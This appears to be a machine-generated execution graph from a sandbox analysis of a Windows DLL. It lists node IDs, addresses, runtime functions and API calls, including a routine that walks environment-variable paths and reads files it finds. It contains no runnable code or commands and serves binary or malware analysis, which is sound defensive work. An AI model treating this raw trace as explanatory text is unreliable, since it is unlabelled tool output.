                                                                                                                                                                                                                      execution_graph 7090 10008640 7093 10008657 7090->7093 7094 10008665 7093->7094 7095 10008679 7093->7095 7096 10006368 _free 19 API calls 7094->7096 7097 10008681 7095->7097 7100 10008693 7095->7100 7098 1000866a 7096->7098 7099 10006368 _free 19 API calls 7097->7099 7102 100062ac ___std_exception_copy 25 API calls 7098->7102 7103 10008686 7099->7103 7101 100054a7 __fassign 36 API calls 7100->7101 7104 10008652 7100->7104 7101->7104 7102->7104 7105 100062ac ___std_exception_copy 25 API calls 7103->7105 7105->7104 7661 10007a80 7662 10007a8d 7661->7662 7663 1000637b _abort 19 API calls 7662->7663 7664 10007aa7 7663->7664 7665 1000571e _free 19 API calls 7664->7665 7666 10007ab3 7665->7666 7667 1000637b _abort 19 API calls 7666->7667 7671 10007ad9 7666->7671 7669 10007acd 7667->7669 7668 10005eb7 10 API calls 7668->7671 7670 1000571e _free 19 API calls 7669->7670 7670->7671 7671->7668 7672 10007ae5 7671->7672 7001 10007103 GetCommandLineA GetCommandLineW 7002 10005303 7005 100050a5 7002->7005 7014 1000502f 7005->7014 7008 1000502f 5 API calls 7009 100050c3 7008->7009 7018 10005000 7009->7018 7012 10005000 19 API calls 7013 100050d9 7012->7013 7015 10005048 7014->7015 7016 10002ada _ValidateLocalCookies 5 API calls 7015->7016 7017 10005069 7016->7017 7017->7008 7019 1000502a 7018->7019 7020 1000500d 7018->7020 7019->7012 7021 10005024 7020->7021 7022 1000571e _free 19 API calls 7020->7022 7023 1000571e _free 19 API calls 7021->7023 7022->7020 7023->7019 7106 1000af43 7107 1000af59 7106->7107 7108 1000af4d 7106->7108 7108->7107 7109 1000af52 CloseHandle 7108->7109 7109->7107 7110 1000a945 7112 1000a96d 7110->7112 7111 1000a9a5 7112->7111 7113 1000a997 7112->7113 7114 1000a99e 7112->7114 7119 1000aa17 7113->7119 7123 1000aa00 7114->7123 7120 1000aa20 7119->7120 7127 1000b19b 7120->7127 7124 1000aa20 7123->7124 7125 1000b19b __startOneArgErrorHandling 20 API calls 7124->7125 7126 1000a9a3 7125->7126 7128 1000b1da __startOneArgErrorHandling 7127->7128 7132 1000b25c __startOneArgErrorHandling 7128->7132 7137 1000b59e 7128->7137 7130 1000b286 7133 1000b292 7130->7133 7144 1000b8b2 7130->7144 7132->7130 7140 100078a3 7132->7140 7135 10002ada _ValidateLocalCookies 5 API calls 7133->7135 7136 1000a99c 7135->7136 7151 1000b5c1 7137->7151 7141 100078cb 7140->7141 7142 10002ada _ValidateLocalCookies 5 API calls 7141->7142 7143 100078e8 7142->7143 7143->7130 7145 1000b8d4 7144->7145 7146 1000b8bf 7144->7146 7148 10006368 _free 19 API calls 7145->7148 7147 1000b8d9 7146->7147 7149 10006368 _free 19 API calls 7146->7149 7147->7133 7148->7147 7150 1000b8cc 7149->7150 7150->7133 7152 1000b5ec __raise_exc 7151->7152 7153 1000b7e5 RaiseException 7152->7153 7154 1000b5bc 7153->7154 7154->7132 7768 1000a1c6 IsProcessorFeaturePresent 7769 10007bc7 7770 10007bd3 ___DestructExceptionObject 7769->7770 7771 10007c0a _abort 7770->7771 7777 10005671 RtlEnterCriticalSection 7770->7777 7773 10007be7 7774 10007f86 __fassign 19 API calls 7773->7774 7775 10007bf7 7774->7775 7778 10007c10 7775->7778 7777->7773 7781 100056b9 RtlLeaveCriticalSection 7778->7781 7780 10007c17 7780->7771 7781->7780 7155 10005348 7156 10003529 ___vcrt_uninitialize 7 API calls 7155->7156 7157 1000534f 7156->7157 7158 10007b48 7168 10008ebf 7158->7168 7162 10007b55 7181 1000907c 7162->7181 7165 10007b7f 7166 1000571e _free 19 API calls 7165->7166 7167 10007b8a 7166->7167 7185 10008ec8 7168->7185 7170 10007b50 7171 10008fdc 7170->7171 7172 10008fe8 ___DestructExceptionObject 7171->7172 7205 10005671 RtlEnterCriticalSection 7172->7205 7174 10008ff3 7175 1000905e 7174->7175 7177 10009032 RtlDeleteCriticalSection 7174->7177 7206 1000a09c 7174->7206 7219 10009073 7175->7219 7179 1000571e _free 19 API calls 7177->7179 7179->7174 7180 1000906a _abort 7180->7162 7182 10009092 7181->7182 7183 10007b64 RtlDeleteCriticalSection 7181->7183 7182->7183 7184 1000571e _free 19 API calls 7182->7184 7183->7162 7183->7165 7184->7183 7186 10008ed4 ___DestructExceptionObject 7185->7186 7195 10005671 RtlEnterCriticalSection 7186->7195 7188 10008ee3 7189 10008f77 7188->7189 7194 10008e78 63 API calls 7188->7194 7196 10007b94 RtlEnterCriticalSection 7188->7196 7197 10008f6d 7188->7197 7200 10008f97 7189->7200 7192 10008f83 _abort 7192->7170 7194->7188 7195->7188 7196->7188 7203 10007ba8 RtlLeaveCriticalSection 7197->7203 7199 10008f75 7199->7188 7204 100056b9 RtlLeaveCriticalSection 7200->7204 7202 10008f9e 7202->7192 7203->7199 7204->7202 7205->7174 7207 1000a0a8 ___DestructExceptionObject 7206->7207 7208 1000a0b9 7207->7208 7209 1000a0ce 7207->7209 7210 10006368 _free 19 API calls 7208->7210 7218 1000a0c9 _abort 7209->7218 7222 10007b94 RtlEnterCriticalSection 7209->7222 7211 1000a0be 7210->7211 7213 100062ac ___std_exception_copy 25 API calls 7211->7213 7213->7218 7214 1000a0ea 7223 1000a026 7214->7223 7216 1000a0f5 7239 1000a112 7216->7239 7218->7174 7487 100056b9 RtlLeaveCriticalSection 7219->7487 7221 1000907a 7221->7180 7222->7214 7224 1000a033 7223->7224 7226 1000a048 7223->7226 7225 10006368 _free 19 API calls 7224->7225 7227 1000a038 7225->7227 7231 1000a043 7226->7231 7242 10008e12 7226->7242 7229 100062ac ___std_exception_copy 25 API calls 7227->7229 7229->7231 7231->7216 7232 1000907c 19 API calls 7233 1000a064 7232->7233 7248 10007a5a 7233->7248 7235 1000a06a 7255 1000adce 7235->7255 7238 1000571e _free 19 API calls 7238->7231 7486 10007ba8 RtlLeaveCriticalSection 7239->7486 7241 1000a11a 7241->7218 7243 10008e26 7242->7243 7244 10008e2a 7242->7244 7243->7232 7244->7243 7245 10007a5a 25 API calls 7244->7245 7246 10008e4a 7245->7246 7270 10009a22 7246->7270 7249 10007a66 7248->7249 7250 10007a7b 7248->7250 7251 10006368 _free 19 API calls 7249->7251 7250->7235 7252 10007a6b 7251->7252 7253 100062ac ___std_exception_copy 25 API calls 7252->7253 7254 10007a76 7253->7254 7254->7235 7256 1000addd 7255->7256 7257 1000adf2 7255->7257 7259 10006355 __dosmaperr 19 API calls 7256->7259 7258 1000ae2d 7257->7258 7262 1000ae19 7257->7262 7260 10006355 __dosmaperr 19 API calls 7258->7260 7261 1000ade2 7259->7261 7263 1000ae32 7260->7263 7264 10006368 _free 19 API calls 7261->7264 7443 1000ada6 7262->7443 7266 10006368 _free 19 API calls 7263->7266 7267 1000a070 7264->7267 7268 1000ae3a 7266->7268 7267->7231 7267->7238 7269 100062ac ___std_exception_copy 25 API calls 7268->7269 7269->7267 7271 10009a2e ___DestructExceptionObject 7270->7271 7272 10009a36 7271->7272 7273 10009a4e 7271->7273 7295 10006355 7272->7295 7275 10009aec 7273->7275 7279 10009a83 7273->7279 7277 10006355 __dosmaperr 19 API calls 7275->7277 7280 10009af1 7277->7280 7278 10006368 _free 19 API calls 7291 10009a43 _abort 7278->7291 7298 10008c7b RtlEnterCriticalSection 7279->7298 7282 10006368 _free 19 API calls 7280->7282 7284 10009af9 7282->7284 7283 10009a89 7285 10009aa5 7283->7285 7286 10009aba 7283->7286 7287 100062ac ___std_exception_copy 25 API calls 7284->7287 7289 10006368 _free 19 API calls 7285->7289 7299 10009b0d 7286->7299 7287->7291 7290 10009aaa 7289->7290 7293 10006355 __dosmaperr 19 API calls 7290->7293 7291->7243 7292 10009ab5 7350 10009ae4 7292->7350 7293->7292 7296 10005b7a _free 19 API calls 7295->7296 7297 1000635a 7296->7297 7297->7278 7298->7283 7300 10009b34 7299->7300 7301 10009b3b 7299->7301 7305 10002ada _ValidateLocalCookies 5 API calls 7300->7305 7302 10009b5e 7301->7302 7303 10009b3f 7301->7303 7308 10009baf 7302->7308 7309 10009b92 7302->7309 7304 10006355 __dosmaperr 19 API calls 7303->7304 7307 10009b44 7304->7307 7306 10009d15 7305->7306 7306->7292 7311 10006368 _free 19 API calls 7307->7311 7312 10009bc5 7308->7312 7353 1000a00b 7308->7353 7310 10006355 __dosmaperr 19 API calls 7309->7310 7313 10009b97 7310->7313 7314 10009b4b 7311->7314 7356 100096b2 7312->7356 7317 10006368 _free 19 API calls 7313->7317 7318 100062ac ___std_exception_copy 25 API calls 7314->7318 7320 10009b9f 7317->7320 7318->7300 7323 100062ac ___std_exception_copy 25 API calls 7320->7323 7321 10009bd3 7326 10009bd7 7321->7326 7327 10009bf9 7321->7327 7322 10009c0c 7324 10009c20 7322->7324 7325 10009c66 WriteFile 7322->7325 7323->7300 7330 10009c56 7324->7330 7331 10009c28 7324->7331 7328 10009c89 GetLastError 7325->7328 7338 10009bef 7325->7338 7334 10009ccd 7326->7334 7363 10009645 7326->7363 7368 10009492 GetConsoleCP 7327->7368 7328->7338 7394 10009728 7330->7394 7335 10009c46 7331->7335 7336 10009c2d 7331->7336 7334->7300 7337 10006368 _free 19 API calls 7334->7337 7386 100098f5 7335->7386 7336->7334 7379 10009807 7336->7379 7340 10009cf2 7337->7340 7338->7300 7338->7334 7341 10009ca9 7338->7341 7343 10006355 __dosmaperr 19 API calls 7340->7343 7344 10009cb0 7341->7344 7345 10009cc4 7341->7345 7343->7300 7347 10006368 _free 19 API calls 7344->7347 7401 10006332 7345->7401 7348 10009cb5 7347->7348 7349 10006355 __dosmaperr 19 API calls 7348->7349 7349->7300 7442 10008c9e RtlLeaveCriticalSection 7350->7442 7352 10009aea 7352->7291 7406 10009f8d 7353->7406 7428 10008dbc 7356->7428 7358 100096c2 7359 100096c7 7358->7359 7360 10005af6 _abort 36 API calls 7358->7360 7359->7321 7359->7322 7361 100096ea 7360->7361 7361->7359 7362 10009708 GetConsoleMode 7361->7362 7362->7359 7364 1000966a 7363->7364 7366 1000969f 7363->7366 7365 100096a1 GetLastError 7364->7365 7364->7366 7367 1000a181 WriteConsoleW 7364->7367 7365->7366 7366->7338 7367->7364 7376 100094f5 7368->7376 7378 10009607 7368->7378 7369 10002ada _ValidateLocalCookies 5 API calls 7370 10009641 7369->7370 7370->7338 7372 100079e6 38 API calls __fassign 7372->7376 7373 1000957b WideCharToMultiByte 7374 100095a1 WriteFile 7373->7374 7373->7378 7375 1000962a GetLastError 7374->7375 7374->7376 7375->7378 7376->7372 7376->7373 7377 100095d2 WriteFile 7376->7377 7376->7378 7437 10007c19 7376->7437 7377->7375 7377->7376 7378->7369 7380 10009816 7379->7380 7381 100098d8 7380->7381 7382 10009894 WriteFile 7380->7382 7383 10002ada _ValidateLocalCookies 5 API calls 7381->7383 7382->7380 7385 100098da GetLastError 7382->7385 7384 100098f1 7383->7384 7384->7338 7385->7381 7391 10009904 7386->7391 7387 10009a0f 7388 10002ada _ValidateLocalCookies 5 API calls 7387->7388 7390 10009a1e 7388->7390 7389 10009986 WideCharToMultiByte 7392 10009a07 GetLastError 7389->7392 7393 100099bb WriteFile 7389->7393 7390->7338 7391->7387 7391->7389 7391->7393 7392->7387 7393->7391 7393->7392 7399 10009737 7394->7399 7395 100097ea 7396 10002ada _ValidateLocalCookies 5 API calls 7395->7396 7398 10009803 7396->7398 7397 100097a9 WriteFile 7397->7399 7400 100097ec GetLastError 7397->7400 7398->7338 7399->7395 7399->7397 7400->7395 7402 10006355 __dosmaperr 19 API calls 7401->7402 7403 1000633d _free 7402->7403 7404 10006368 _free 19 API calls 7403->7404 7405 10006350 7404->7405 7405->7300 7415 10008d52 7406->7415 7408 10009f9f 7409 10009fa7 7408->7409 7410 10009fb8 SetFilePointerEx 7408->7410 7411 10006368 _free 19 API calls 7409->7411 7412 10009fd0 GetLastError 7410->7412 7414 10009fac 7410->7414 7411->7414 7413 10006332 __dosmaperr 19 API calls 7412->7413 7413->7414 7414->7312 7416 10008d5f 7415->7416 7417 10008d74 7415->7417 7418 10006355 __dosmaperr 19 API calls 7416->7418 7420 10006355 __dosmaperr 19 API calls 7417->7420 7422 10008d99 7417->7422 7419 10008d64 7418->7419 7421 10006368 _free 19 API calls 7419->7421 7423 10008da4 7420->7423 7424 10008d6c 7421->7424 7422->7408 7425 10006368 _free 19 API calls 7423->7425 7424->7408 7426 10008dac 7425->7426 7427 100062ac ___std_exception_copy 25 API calls 7426->7427 7427->7424 7429 10008dc9 7428->7429 7431 10008dd6 7428->7431 7430 10006368 _free 19 API calls 7429->7430 7434 10008dce 7430->7434 7432 10008de2 7431->7432 7433 10006368 _free 19 API calls 7431->7433 7432->7358 7435 10008e03 7433->7435 7434->7358 7436 100062ac ___std_exception_copy 25 API calls 7435->7436 7436->7434 7438 10005af6 _abort 36 API calls 7437->7438 7439 10007c24 7438->7439 7440 10007a00 __fassign 36 API calls 7439->7440 7441 10007c34 7440->7441 7441->7376 7442->7352 7446 1000ad24 7443->7446 7445 1000adca 7445->7267 7447 1000ad30 ___DestructExceptionObject 7446->7447 7457 10008c7b RtlEnterCriticalSection 7447->7457 7449 1000ad3e 7450 1000ad70 7449->7450 7451 1000ad65 7449->7451 7452 10006368 _free 19 API calls 7450->7452 7458 1000ae4d 7451->7458 7454 1000ad6b 7452->7454 7473 1000ad9a 7454->7473 7456 1000ad8d _abort 7456->7445 7457->7449 7459 10008d52 25 API calls 7458->7459 7462 1000ae5d 7459->7462 7460 1000ae63 7476 10008cc1 7460->7476 7462->7460 7463 1000ae95 7462->7463 7466 10008d52 25 API calls 7462->7466 7463->7460 7464 10008d52 25 API calls 7463->7464 7467 1000aea1 CloseHandle 7464->7467 7469 1000ae8c 7466->7469 7467->7460 7470 1000aead GetLastError 7467->7470 7468 1000aedd 7468->7454 7472 10008d52 25 API calls 7469->7472 7470->7460 7471 10006332 __dosmaperr 19 API calls 7471->7468 7472->7463 7485 10008c9e RtlLeaveCriticalSection 7473->7485 7475 1000ada4 7475->7456 7477 10008cd0 7476->7477 7478 10008d37 7476->7478 7477->7478 7482 10008cfa 7477->7482 7479 10006368 _free 19 API calls 7478->7479 7480 10008d3c 7479->7480 7481 10006355 __dosmaperr 19 API calls 7480->7481 7483 10008d27 7481->7483 7482->7483 7484 10008d21 SetStdHandle 7482->7484 7483->7468 7483->7471 7484->7483 7485->7475 7486->7241 7487->7221 7488 10002049 7489 10002055 ___DestructExceptionObject 7488->7489 7490 100020d3 7489->7490 7491 1000207d 7489->7491 7501 1000205e 7489->7501 7493 10002639 ___scrt_fastfail 4 API calls 7490->7493 7502 1000244c 7491->7502 7495 100020da 7493->7495 7494 10002082 7511 10002308 7494->7511 7497 10002087 __RTC_Initialize 7514 100020c4 7497->7514 7499 1000209f 7517 1000260b 7499->7517 7503 10002451 ___scrt_release_startup_lock 7502->7503 7504 10002455 7503->7504 7506 10002461 7503->7506 7505 1000527a _abort 19 API calls 7504->7505 7507 1000245f 7505->7507 7508 1000246e 7506->7508 7509 1000499b _abort 26 API calls 7506->7509 7507->7494 7508->7494 7510 10004bbd 7509->7510 7510->7494 7523 100034c7 RtlInterlockedFlushSList 7511->7523 7513 10002312 7513->7497 7525 1000246f 7514->7525 7516 100020c9 ___scrt_release_startup_lock 7516->7499 7518 10002617 7517->7518 7519 1000262d 7518->7519 7533 100053ed 7518->7533 7519->7501 7522 10003529 ___vcrt_uninitialize 7 API calls 7522->7519 7524 100034d7 7523->7524 7524->7513 7530 100053ff 7525->7530 7528 1000391b ___vcrt_uninitialize_ptd 5 API calls 7529 1000354d 7528->7529 7529->7516 7531 10005c2b 10 API calls 7530->7531 7532 10002476 7531->7532 7532->7528 7536 100074da 7533->7536 7539 100074f3 7536->7539 7537 10002ada _ValidateLocalCookies 5 API calls 7538 10002625 7537->7538 7538->7522 7539->7537 7673 10008a89 7676 10006d60 7673->7676 7677 10006d69 7676->7677 7678 10006d72 7676->7678 7679 10006c5f 49 API calls 7677->7679 7679->7678 6848 1000220c 6849 10002215 6848->6849 6850 1000221a dllmain_dispatch 6848->6850 6852 100022b1 6849->6852 6853 100022c7 6852->6853 6855 100022d0 6853->6855 6856 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6853->6856 6855->6850 6856->6855 7540 1000724e GetProcessHeap 7541 1000284f 7542 10002882 std::exception::exception 26 API calls 7541->7542 7543 1000285d 7542->7543 7684 10003c90 RtlUnwind 7782 100036d0 7783 100036e2 7782->7783 7785 100036f0 @_EH4_CallFilterFunc@8 7782->7785 7784 10002ada _ValidateLocalCookies 5 API calls 7783->7784 7784->7785 7544 10005351 7545 10005374 7544->7545 7546 10005360 7544->7546 7547 1000571e _free 19 API calls 7545->7547 7546->7545 7548 1000571e _free 19 API calls 7546->7548 7549 10005386 7547->7549 7548->7545 7550 1000571e _free 19 API calls 7549->7550 7551 10005399 7550->7551 7552 1000571e _free 19 API calls 7551->7552 7553 100053aa 7552->7553 7554 1000571e _free 19 API calls 7553->7554 7555 100053bb 7554->7555 7786 100073d5 7787 100073e1 ___DestructExceptionObject 7786->7787 7798 10005671 RtlEnterCriticalSection 7787->7798 7789 100073e8 7790 10008be3 26 API calls 7789->7790 7791 100073f7 7790->7791 7792 10007406 7791->7792 7799 10007269 GetStartupInfoW 7791->7799 7810 10007422 7792->7810 7795 10007417 _abort 7798->7789 7800 10007286 7799->7800 7801 10007318 7799->7801 7800->7801 7802 10008be3 26 API calls 7800->7802 7805 1000731f 7801->7805 7803 100072af 7802->7803 7803->7801 7804 100072dd GetFileType 7803->7804 7804->7803 7806 10007326 7805->7806 7807 10007369 GetStdHandle 7806->7807 7808 100073d1 7806->7808 7809 1000737c GetFileType 7806->7809 7807->7806 7808->7792 7809->7806 7813 100056b9 RtlLeaveCriticalSection 7810->7813 7812 10007429 7812->7795 7813->7812 7814 10004ed7 7815 10006d60 49 API calls 7814->7815 7816 10004ee9 7815->7816 7825 10007153 GetEnvironmentStringsW 7816->7825 7819 10004ef4 7821 1000571e _free 19 API calls 7819->7821 7822 10004f29 7821->7822 7823 10004eff 7824 1000571e _free 19 API calls 7823->7824 7824->7819 7826 100071bd 7825->7826 7827 1000716a 7825->7827 7829 100071c6 FreeEnvironmentStringsW 7826->7829 7830 10004eee 7826->7830 7828 10007170 WideCharToMultiByte 7827->7828 7828->7826 7831 1000718c 7828->7831 7829->7830 7830->7819 7837 10004f2f 7830->7837 7832 100056d0 20 API calls 7831->7832 7833 10007192 7832->7833 7834 100071af 7833->7834 7835 10007199 WideCharToMultiByte 7833->7835 7836 1000571e _free 19 API calls 7834->7836 7835->7834 7836->7826 7838 10004f44 7837->7838 7839 1000637b _abort 19 API calls 7838->7839 7845 10004f6b 7839->7845 7840 10004fcf 7841 1000571e _free 19 API calls 7840->7841 7842 10004fe9 7841->7842 7842->7823 7843 1000637b _abort 19 API calls 7843->7845 7844 10004fd1 7846 10005000 19 API calls 7844->7846 7845->7840 7845->7843 7845->7844 7847 1000544d ___std_exception_copy 25 API calls 7845->7847 7849 10004ff3 7845->7849 7852 1000571e _free 19 API calls 7845->7852 7848 10004fd7 7846->7848 7847->7845 7850 1000571e _free 19 API calls 7848->7850 7851 100062bc ___std_exception_copy 11 API calls 7849->7851 7850->7840 7853 10004fff 7851->7853 7852->7845 7024 10002418 7025 10002420 ___scrt_release_startup_lock 7024->7025 7028 100047f5 7025->7028 7027 10002448 7029 10004804 7028->7029 7030 10004808 7028->7030 7029->7027 7033 10004815 7030->7033 7034 10005b7a _free 19 API calls 7033->7034 7037 1000482c 7034->7037 7035 10002ada _ValidateLocalCookies 5 API calls 7036 10004811 7035->7036 7036->7027 7037->7035 7685 10004a9a 7688 10005411 7685->7688 7689 1000541d _abort 7688->7689 7690 10005af6 _abort 36 API calls 7689->7690 7693 10005422 7690->7693 7691 100055a8 _abort 36 API calls 7692 1000544c 7691->7692 7693->7691 6555 10001c5b 6556 10001c6b ___scrt_fastfail 6555->6556 6559 100012ee 6556->6559 6558 10001c87 6560 10001324 ___scrt_fastfail 6559->6560 6561 100013b7 GetEnvironmentVariableW 6560->6561 6585 100010f1 6561->6585 6564 100010f1 51 API calls 6565 10001465 6564->6565 6566 100010f1 51 API calls 6565->6566 6567 10001479 6566->6567 6568 100010f1 51 API calls 6567->6568 6569 1000148d 6568->6569 6570 100010f1 51 API calls 6569->6570 6571 100014a1 6570->6571 6572 100010f1 51 API calls 6571->6572 6573 100014b5 lstrlenW 6572->6573 6574 100014d2 6573->6574 6575 100014d9 lstrlenW 6573->6575 6574->6558 6576 100010f1 51 API calls 6575->6576 6577 10001501 lstrlenW lstrcatW 6576->6577 6578 100010f1 51 API calls 6577->6578 6579 10001539 lstrlenW lstrcatW 6578->6579 6580 100010f1 51 API calls 6579->6580 6581 1000156b lstrlenW lstrcatW 6580->6581 6582 100010f1 51 API calls 6581->6582 6583 1000159d lstrlenW lstrcatW 6582->6583 6584 100010f1 51 API calls 6583->6584 6584->6574 6586 10001118 ___scrt_fastfail 6585->6586 6587 10001129 lstrlenW 6586->6587 6598 10002c40 6587->6598 6589 10001148 lstrcatW lstrlenW 6590 10001177 lstrlenW FindFirstFileW 6589->6590 6591 10001168 lstrlenW 6589->6591 6592 100011a0 6590->6592 6593 100011e1 6590->6593 6591->6590 6594 100011c7 FindNextFileW 6592->6594 6595 100011aa 6592->6595 6593->6564 6594->6592 6597 100011da FindClose 6594->6597 6595->6594 6600 10001000 6595->6600 6597->6593 6599 10002c57 6598->6599 6599->6589 6599->6599 6601 10001022 ___scrt_fastfail 6600->6601 6602 100010af 6601->6602 6603 1000102f lstrcatW lstrlenW 6601->6603 6606 100010b5 lstrlenW 6602->6606 6616 100010ad 6602->6616 6604 1000105a lstrlenW 6603->6604 6605 1000106b lstrlenW 6603->6605 6604->6605 6617 10001e89 lstrlenW 6605->6617 6631 10001e16 6606->6631 6609 10001088 GetFileAttributesW 6612 1000109c 6609->6612 6609->6616 6610 100010ca 6611 10001e89 5 API calls 6610->6611 6610->6616 6613 100010df 6611->6613 6612->6616 6623 1000173a 6612->6623 6636 100011ea 6613->6636 6616->6595 6618 10002c40 ___scrt_fastfail 6617->6618 6619 10001ea7 lstrcatW lstrlenW 6618->6619 6620 10001ed1 lstrcatW 6619->6620 6621 10001ec2 6619->6621 6620->6609 6621->6620 6622 10001ec7 lstrlenW 6621->6622 6622->6620 6624 10001747 ___scrt_fastfail 6623->6624 6651 10001cca 6624->6651 6628 1000199f 6628->6616 6629 10001824 ___scrt_fastfail _strlen 6629->6628 6669 100015da 6629->6669 6632 10001e29 6631->6632 6633 10001e4c 6631->6633 6632->6633 6634 10001e2d lstrlenW 6632->6634 6633->6610 6634->6633 6635 10001e3f lstrlenW 6634->6635 6635->6633 6637 1000120e ___scrt_fastfail 6636->6637 6638 10001e89 5 API calls 6637->6638 6639 10001220 GetFileAttributesW 6638->6639 6640 10001235 6639->6640 6641 10001246 6639->6641 6640->6641 6643 1000173a 29 API calls 6640->6643 6642 10001e89 5 API calls 6641->6642 6644 10001258 6642->6644 6643->6641 6645 100010f1 50 API calls 6644->6645 6646 1000126d 6645->6646 6647 10001e89 5 API calls 6646->6647 6648 1000127f ___scrt_fastfail 6647->6648 6649 100010f1 50 API calls 6648->6649 6650 100012e6 6649->6650 6650->6616 6652 10001cf1 ___scrt_fastfail 6651->6652 6653 10001d55 GetFileSize 6652->6653 6658 10001808 6652->6658 6654 10001ede 21 API calls 6653->6654 6655 10001d66 ReadFile 6654->6655 6656 10001d94 CloseHandle 6655->6656 6657 10001d7d CloseHandle 6655->6657 6656->6658 6657->6658 6658->6628 6659 10001ede 6658->6659 6661 1000222f 6659->6661 6662 1000224e 6661->6662 6663 1000474f _abort 7 API calls 6661->6663 6665 10002250 6661->6665 6677 100047e5 6661->6677 6662->6629 6663->6661 6664 10002908 6666 100035d2 __CxxThrowException@8 RaiseException 6664->6666 6665->6664 6684 100035d2 6665->6684 6668 10002925 6666->6668 6668->6629 6670 1000160c _strcat _strlen 6669->6670 6671 1000163c lstrlenW 6670->6671 6687 10001c9d 6671->6687 6673 10001655 lstrcatW lstrlenW 6674 10001678 6673->6674 6675 10001693 ___scrt_fastfail 6674->6675 6676 1000167e lstrcatW 6674->6676 6675->6629 6676->6675 6683 100056d0 _abort 6677->6683 6678 1000570e 6680 10006368 _free 19 API calls 6678->6680 6679 100056f9 RtlAllocateHeap 6681 1000570c 6679->6681 6679->6683 6680->6681 6681->6661 6682 1000474f _abort 7 API calls 6682->6683 6683->6678 6683->6679 6683->6682 6686 100035f2 RaiseException 6684->6686 6686->6664 6688 10001ca6 _strlen 6687->6688 6688->6673 6689 100020db 6690 100020e7 ___DestructExceptionObject 6689->6690 6691 10002110 dllmain_raw 6690->6691 6695 1000210b 6690->6695 6700 100020f6 6690->6700 6692 1000212a 6691->6692 6691->6700 6702 10001eec 6692->6702 6694 10002177 6696 10001eec 29 API calls 6694->6696 6694->6700 6695->6694 6698 10001eec 29 API calls 6695->6698 6695->6700 6697 1000218a 6696->6697 6699 10002193 dllmain_raw 6697->6699 6697->6700 6701 1000216d dllmain_raw 6698->6701 6699->6700 6701->6694 6703 10001ef7 6702->6703 6704 10001f2a dllmain_crt_process_detach 6702->6704 6705 10001f1c dllmain_crt_process_attach 6703->6705 6706 10001efc 6703->6706 6707 10001f06 6704->6707 6705->6707 6708 10001f01 6706->6708 6709 10001f12 6706->6709 6707->6695 6708->6707 6712 1000240b 6708->6712 6717 100023ec 6709->6717 6725 100053e5 6712->6725 6830 10003513 6717->6830 6722 10002408 6722->6707 6723 1000351e 6 API calls 6724 100023f5 6723->6724 6724->6707 6731 10005aca 6725->6731 6728 1000351e 6803 10003820 6728->6803 6730 10002415 6730->6707 6732 10005ad4 6731->6732 6733 10002410 6731->6733 6734 10005e08 _abort 10 API calls 6732->6734 6733->6728 6735 10005adb 6734->6735 6735->6733 6736 10005e5e _abort 10 API calls 6735->6736 6737 10005aee 6736->6737 6739 100059b5 6737->6739 6740 100059c0 6739->6740 6741 100059d0 6739->6741 6745 100059d6 6740->6745 6741->6733 6744 1000571e _free 19 API calls 6744->6741 6746 100059ef 6745->6746 6747 100059e9 6745->6747 6749 1000571e _free 19 API calls 6746->6749 6748 1000571e _free 19 API calls 6747->6748 6748->6746 6750 100059fb 6749->6750 6751 1000571e _free 19 API calls 6750->6751 6752 10005a06 6751->6752 6753 1000571e _free 19 API calls 6752->6753 6754 10005a11 6753->6754 6755 1000571e _free 19 API calls 6754->6755 6756 10005a1c 6755->6756 6757 1000571e _free 19 API calls 6756->6757 6758 10005a27 6757->6758 6759 1000571e _free 19 API calls 6758->6759 6760 10005a32 6759->6760 6761 1000571e _free 19 API calls 6760->6761 6762 10005a3d 6761->6762 6763 1000571e _free 19 API calls 6762->6763 6764 10005a48 6763->6764 6765 1000571e _free 19 API calls 6764->6765 6766 10005a56 6765->6766 6771 1000589c 6766->6771 6777 100057a8 6771->6777 6773 100058c0 6774 100058ec 6773->6774 6790 10005809 6774->6790 6776 10005910 6776->6744 6778 100057b4 ___DestructExceptionObject 6777->6778 6785 10005671 RtlEnterCriticalSection 6778->6785 6780 100057e8 6786 100057fd 6780->6786 6782 100057f5 _abort 6782->6773 6783 100057be 6783->6780 6784 1000571e _free 19 API calls 6783->6784 6784->6780 6785->6783 6789 100056b9 RtlLeaveCriticalSection 6786->6789 6788 10005807 6788->6782 6789->6788 6791 10005815 ___DestructExceptionObject 6790->6791 6798 10005671 RtlEnterCriticalSection 6791->6798 6793 1000581f 6794 10005a7f _abort 19 API calls 6793->6794 6795 10005832 6794->6795 6799 10005848 6795->6799 6797 10005840 _abort 6797->6776 6798->6793 6802 100056b9 RtlLeaveCriticalSection 6799->6802 6801 10005852 6801->6797 6802->6801 6804 1000382d 6803->6804 6808 1000384b ___vcrt_freefls@4 6803->6808 6805 1000383b 6804->6805 6809 10003b67 6804->6809 6814 10003ba2 6805->6814 6808->6730 6819 10003a82 6809->6819 6811 10003b81 6812 10003b99 TlsGetValue 6811->6812 6813 10003b8d 6811->6813 6812->6813 6813->6805 6815 10003a82 try_get_function 4 API calls 6814->6815 6816 10003bbc 6815->6816 6817 10003bd7 TlsSetValue 6816->6817 6818 10003bcb 6816->6818 6817->6818 6818->6808 6820 10003aaa 6819->6820 6822 10003aa6 __crt_fast_encode_pointer 6819->6822 6820->6822 6823 100039be 6820->6823 6822->6811 6828 100039cd try_get_first_available_module 6823->6828 6824 10003a77 6824->6822 6825 100039ea LoadLibraryExW 6826 10003a05 GetLastError 6825->6826 6825->6828 6826->6828 6827 10003a60 FreeLibrary 6827->6828 6828->6824 6828->6825 6828->6827 6829 10003a38 LoadLibraryExW 6828->6829 6829->6828 6836 10003856 6830->6836 6832 100023f1 6832->6724 6833 100053da 6832->6833 6834 10005b7a _free 19 API calls 6833->6834 6835 100023fd 6834->6835 6835->6722 6835->6723 6837 10003862 GetLastError 6836->6837 6838 1000385f 6836->6838 6839 10003b67 ___vcrt_FlsGetValue 5 API calls 6837->6839 6838->6832 6840 10003877 6839->6840 6841 100038dc SetLastError 6840->6841 6842 10003ba2 ___vcrt_FlsSetValue 5 API calls 6840->6842 6847 10003896 6840->6847 6841->6832 6843 10003890 6842->6843 6844 100038b8 6843->6844 6845 10003ba2 ___vcrt_FlsSetValue 5 API calls 6843->6845 6843->6847 6846 10003ba2 ___vcrt_FlsSetValue 5 API calls 6844->6846 6844->6847 6845->6844 6846->6847 6847->6841 7038 1000281c 7041 10002882 7038->7041 7044 10003550 7041->7044 7043 1000282a 7045 1000355d 7044->7045 7048 1000358a 7044->7048 7046 100047e5 ___std_exception_copy 20 API calls 7045->7046 7045->7048 7047 1000357a 7046->7047 7047->7048 7050 1000544d 